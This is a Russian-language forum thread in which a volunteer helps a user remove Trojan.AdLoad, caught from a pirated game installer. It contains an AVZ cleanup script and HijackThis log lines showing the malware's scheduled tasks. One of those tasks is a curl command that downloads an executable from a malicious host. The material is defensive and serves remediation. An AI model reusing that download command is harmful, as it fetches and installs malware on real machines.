Спасите Trojan.AdLoad

[senyaIvanov]

Здравствуйте, скачивал игру Superhot с известного сайта evrl скачал запустил установщик, 67% а тут бац MBAM обнаружает угрозу и отправляет в карантин, но боюсь что он оставил свои файлы, очень нужны файлы думаю что загрузил ещё Трои( (оч нужны файлы, просто я снимаю майнкрафт(да я очень тупой(чучуть), а там все оформление канала и образ персонажа() что делать? Логи постараюсь сделать

Угроза скрывалась под именем msi.exe

вот логи https://yadi.sk/d/8pprHnL73L6kTh(не понял как прекрипить) (это Collection Log)

 

Здравствуйте, скачивал игру Superhot с известного сайта evrl скачал запустил установщик, 67% а тут бац MBAM обнаружает угрозу и отправляет в карантин, но боюсь что он оставил свои файлы, очень нужны файлы думаю что загрузил ещё Трои( (оч нужны файлы, просто я снимаю майнкрафт(да я очень тупой(чучуть), а там все оформление канала и образ персонажа() что делать? Логи постараюсь сделать

Угроза скрывалась под именем msi.exe

+ вирус сделал запланированую задачу

Изменено 16 июля, 2017 пользователем senyaIvanov

[regist]

Здравствуйте!

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('C:\Users\Clery\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteFileMask('C:\Users\Clery\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\Clery\AppData\Roaming\curl\');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.
 

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

 

Полученный ответ сообщите здесь (с указанием номера KLAN)
 

- Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.

Изменено 16 июля, 2017 пользователем regist

[senyaIvanov]

Здравствуйте!

 

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

 

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('C:\Users\Clery\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteFileMask('C:\Users\Clery\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\Clery\AppData\Roaming\curl\');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 

- Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

 

Полученный ответ сообщите здесь (с указанием номера KLAN)

 

- Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.

Дело в том что мбам закинул его в карантин, мне вытащить его?

Здравствуйте!

 

- Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

 

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '');
 QuarantineFileF('C:\Users\Clery\AppData\Roaming\curl\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe', '32');
 ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
 DeleteFileMask('C:\Users\Clery\AppData\Roaming\curl\', '*', true);
 DeleteDirectory('C:\Users\Clery\AppData\Roaming\curl\');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 

- Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

 

Полученный ответ сообщите здесь (с указанием номера KLAN)

 

- Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.

 

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. Для повторной диагностики запустите снова Autologger.

Все уже вижу, что он будет удален

https://virusinfo.info/virusdetector/report.php?md5=355F8E2D989D2163543F1BCB7D1F65BF

[regist]

Есть поле быстрого ответа внизу, не надо заниматься оверквотингом. Это только затрудняет чтение.
 

 

 

Все уже вижу, что он будет удален

кто он не понятно.

 

Где всё остальное?

[senyaIvanov]

сейчас

Есть поле быстрого ответа внизу, не надо заниматься оверквотингом. Это только затрудняет чтение.
 

 

 

Все уже вижу, что он будет удален

кто он не понятно.

 

Где всё остальное?

Thank you for contacting Kaspersky Lab

The files have been scanned in automatic mode.

Malicious code detected by Kaspersky Lab products with KSN technology enabled has been found in the following files:
msi.exe - UDS:DangerousObject.Multi.Generic

No information about the specified files can be found in the antivirus databases:
curl_7_54.exe

We will thoroughly analyze the files you sent. If the result of the analysis is different from this automatic scan result, you will be notified via email.

This is an automatically generated message. Please do not reply to it.

Anti-Virus Lab, Kaspersky Lab HQ

"39A/3 Leningradskoe Shosse, Moscow, 125212, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.com http://www.viruslist.com"

--------------------------------------------------------------------------------
Sent: 7/16/2017 5:29:00 PM
To: newvirus@kaspersky.com
Subject: 

[regist]

 

 

сейчас

И почему вы игнорируете и опять занимаетесь оверквотингом?! https://ru.wikipedia.org/wiki/Оверквотинг

[senyaIvanov]

это clear ink log https://yadi.sk/i/HE_K3nPl3L6sZM

простите

[regist]

И опять жду всё остальнео.

И логи надо прикреплять к сообщению.

[senyaIvanov]

сейчас дам новый лог

https://yadi.sk/d/RpYwEs913L6spa

у меня что то не получается прекрепить лог

[Mark D. Pearlstone]

у меня что то не получается прекрепить лог

Нажимайте кнопку "Расширенная форма", затем кнопку "Выберите файл", выбираете файл и жмёте кнопку "Загрузить"

[senyaIvanov]

спасибо

[regist]

"Пофиксите" в HijackThis:

O22 - Task (Ready): MSI - C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe cnt=1 fts="vimetools___.exe" (file missing)
O22 - Task (Ready): curl - C:\Users\Clery\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Clery\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\Clery\AppData\Roaming\curl\curl.exe (file missing)

 

Прикрепите свежий CollectionLog.

[senyaIvanov]

"Пофиксите" в HijackThis:

O22 - Task (Ready): MSI - C:\Users\Clery\AppData\Roaming\Microsoft\msi.exe cnt=1 fts="vimetools___.exe" (file missing)
O22 - Task (Ready): curl - C:\Users\Clery\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Clery\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\Clery\AppData\Roaming\curl\curl.exe (file missing)

Прикрепите свежий CollectionLog.

у меня вопрос, судя по таскам которые вы попросили пофиксить, это сделала программа vimetools___.exe, верно?

вот свежий лог

ой

Я забыл перезагрузится

качать этот CollectionLog-2017.07.16-19.03.zip

тут такое дело, задачи не удалились, смотрел через прогу autoruns.exe

CollectionLog-2017.07.16-18.45.zip

CollectionLog-2017.07.16-19.03.zip

[regist]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
 

[senyaIvanov]

Готово

Жду дальнейших инструкций

Shortcut.txt

FRST.txt

Addition.txt